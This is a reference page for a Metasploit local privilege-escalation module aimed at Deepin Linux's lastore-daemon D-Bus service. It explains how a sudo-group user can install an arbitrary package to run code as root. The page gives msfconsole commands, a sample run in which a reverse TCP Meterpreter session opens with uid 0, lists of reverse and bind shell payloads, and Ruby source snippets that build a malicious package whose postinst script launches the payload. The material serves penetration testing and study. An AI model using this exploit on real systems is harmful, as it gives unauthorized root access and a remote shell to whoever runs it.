lastore-daemon D-Bus Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/lastore_daemon_dbus_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: lastore-daemon D-Bus Privilege Escalation
Module: exploit/linux/local/lastore_daemon_dbus_priv_esc
Source code: modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb
Disclosure date: 2016-02-02
Last modification time: 2020-09-18 11:38:43 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module attempts to gain root privileges on Deepin Linux systems by using lastore-daemon to install a package. The lastore-daemon D-Bus configuration on Deepin Linux permits any user in the sudo group to install arbitrary system packages without providing a password, resulting in code execution as root. By default, the first user created on the system is a member of the sudo group. This module has been tested successfully with lastore-daemon versions 0.9.53-1 on Deepin Linux 15.5 (x64); and 0.9.66-1 on Deepin Linux 15.7 (x64).

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/lastore_daemon_dbus_priv_esc
msf exploit(lastore_daemon_dbus_priv_esc) > show targets
    ... a list of targets ...
msf exploit(lastore_daemon_dbus_priv_esc) > set TARGET target-id
msf exploit(lastore_daemon_dbus_priv_esc) > show options
    ... show and set options ...
msf exploit(lastore_daemon_dbus_priv_esc) > set SESSION session-id
msf exploit(lastore_daemon_dbus_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to gain root privileges on Deepin Linux systems by using lastore-daemon to install a package. It may cause audio and/or graphical signals confirming the installation of the payload package.

Vulnerable Application


The lastore-daemon D-Bus configuration on Deepin Linux permits any user in the sudo group to install arbitrary system packages without providing a password, resulting in code execution as root. By default, the first user created on the system is a member of the sudo group.

The D-Bus configuration in /usr/share/dbus-1/system.d/com.deepin.lastore.conf permits users of the sudo group to execute arbitrary methods on the com.deepin.lastore interface, as shown below:

  <!-- Only root can own the service -->
  
    
    
  

  <!-- Allow sudo group to invoke methods on the interfaces -->
  
    
    
  

This module has been tested successfully with lastore-daemon versions:

  • 0.9.53-1 on Deepin Linux 15.5 (x64)
  • 0.9.66-1 on Deepin Linux 15.7 (x64)

Deepin Linux is available here:

  • https://www.deepin.org/en/mirrors/releases/

lastore-daemon source repository is available here:

  • https://cr.deepin.io/#/admin/projects/lastore/lastore-daemon
  • https://github.com/linuxdeepin/lastore-daemon/

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. use exploit/linux/local/lastore_daemon_dbus_priv_esc
  4. set SESSION [SESSION]
  5. check
  6. run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios


  msf > use exploit/linux/local/lastore_daemon_dbus_priv_esc 
  msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Building package...
  [*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
  [*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
  [*] Uploading payload...
  [*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
  [*] Installing package...
  [*] Sending stage (857352 bytes) to 172.16.191.200
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
  [+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
  [+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
  [+] Deleted /tmp/.1sZZ46ozIH
  [+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
  [*] Removing package...

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.200
  OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux

Go back to menu.

Msfconsole Usage


Here is how the linux/local/lastore_daemon_dbus_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/lastore_daemon_dbus_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/lastore_daemon_dbus_priv_esc) > show info

       Name: lastore-daemon D-Bus Privilege Escalation
     Module: exploit/linux/local/lastore_daemon_dbus_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-02-02

Provided by:
  King's Way
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module attempts to gain root privileges on Deepin Linux systems 
  by using lastore-daemon to install a package. The lastore-daemon 
  D-Bus configuration on Deepin Linux permits any user in the sudo 
  group to install arbitrary system packages without providing a 
  password, resulting in code execution as root. By default, the first 
  user created on the system is a member of the sudo group. This 
  module has been tested successfully with lastore-daemon versions 
  0.9.53-1 on Deepin Linux 15.5 (x64); and 0.9.66-1 on Deepin Linux 
  15.7 (x64).

References:
  https://www.exploit-db.com/exploits/39433
  https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8

Module Options


This is a complete list of options available in the linux/local/lastore_daemon_dbus_priv_esc exploit:

msf6 exploit(linux/local/lastore_daemon_dbus_priv_esc) > show options

Module options (exploit/linux/local/lastore_daemon_dbus_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/lastore_daemon_dbus_priv_esc exploit:

msf6 exploit(linux/local/lastore_daemon_dbus_priv_esc) > show advanced

Module advanced options (exploit/linux/local/lastore_daemon_dbus_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/lastore_daemon_dbus_priv_esc module can exploit:

msf6 exploit(linux/local/lastore_daemon_dbus_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/lastore_daemon_dbus_priv_esc exploit:

msf6 exploit(linux/local/lastore_daemon_dbus_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/lastore_daemon_dbus_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/lastore_daemon_dbus_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

DBus.Error.AccessDenied


Here is a relevant code snippet related to the "DBus.Error.AccessDenied" error message:

76:	    cmd_exec("command -v #{cmd} && echo true").include? 'true'
77:	  end
78:	
79:	  def dbus_priv?
80:	    res = install_package '', ''
81:	    (res.include? 'DBus.Error.AccessDenied') ? false : true
82:	  end
83:	
84:	  def install_package(name, path)
85:	    dbus_send dest: 'com.deepin.lastore',
86:	              type: 'method_call',

<CMD> is not installed. Exploitation will fail.


Here is a relevant code snippet related to the "<CMD> is not installed. Exploitation will fail." error message:

102:	  end
103:	
104:	  def check
105:	    %w(lastore-daemon dpkg-deb dbus-send).each do |cmd|
106:	      unless command_exists? cmd
107:	        vprint_error "#{cmd} is not installed. Exploitation will fail."
108:	        return CheckCode::Safe
109:	      end
110:	      vprint_good "#{cmd} is installed"
111:	    end
112:	

User is not permitted to install packages. Exploitation will fail.


Here is a relevant code snippet related to the "User is not permitted to install packages. Exploitation will fail." error message:

109:	      end
110:	      vprint_good "#{cmd} is installed"
111:	    end
112:	
113:	    unless dbus_priv?
114:	      vprint_error 'User is not permitted to install packages. Exploitation will fail.'
115:	      return CheckCode::Safe
116:	    end
117:	    vprint_good 'User is permitted to install packages'
118:	
119:	    CheckCode::Appears

Session already has root privileges. Set ForceExploit to override.


Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:

120:	  end
121:	
122:	  def exploit
123:	    if is_root?
124:	      unless datastore['ForceExploit']
125:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
126:	      end
127:	    end
128:	
129:	    print_status 'Building package...'
130:	

Building package failed


Here is a relevant code snippet related to the "Building package failed" error message:

143:	    upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &"
144:	
145:	    cmd_exec "dpkg-deb --build '#{pkg_path}'"
146:	
147:	    unless file_exist? "#{pkg_path}.deb"
148:	      fail_with Failure::Unknown, 'Building package failed'
149:	    end
150:	
151:	    print_status 'Uploading payload...'
152:	    upload_and_chmodx payload_path, generate_payload_exe
153:	

Package installation failed. Check /var/log/lastore/daemon.log


Here is a relevant code snippet related to the "Package installation failed. Check /var/log/lastore/daemon.log" error message:

154:	    print_status 'Installing package...'
155:	    res = install_package pkg_name, "#{pkg_path}.deb"
156:	    vprint_line res
157:	
158:	    unless res.include? 'object path'
159:	      fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log'
160:	    end
161:	
162:	    Rex.sleep 15
163:	
164:	    print_status 'Removing package...'

Package removal failed. Check /var/log/lastore/daemon.log


Here is a relevant code snippet related to the "Package removal failed. Check /var/log/lastore/daemon.log" error message:

162:	    Rex.sleep 15
163:	
164:	    print_status 'Removing package...'
165:	    res = remove_package pkg_name.downcase
166:	    vprint_line res
167:	
168:	    unless res.include? 'object path'
169:	      print_warning 'Package removal failed. Check /var/log/lastore/daemon.log'
170:	    end
171:	  end
172:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • King's Way
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.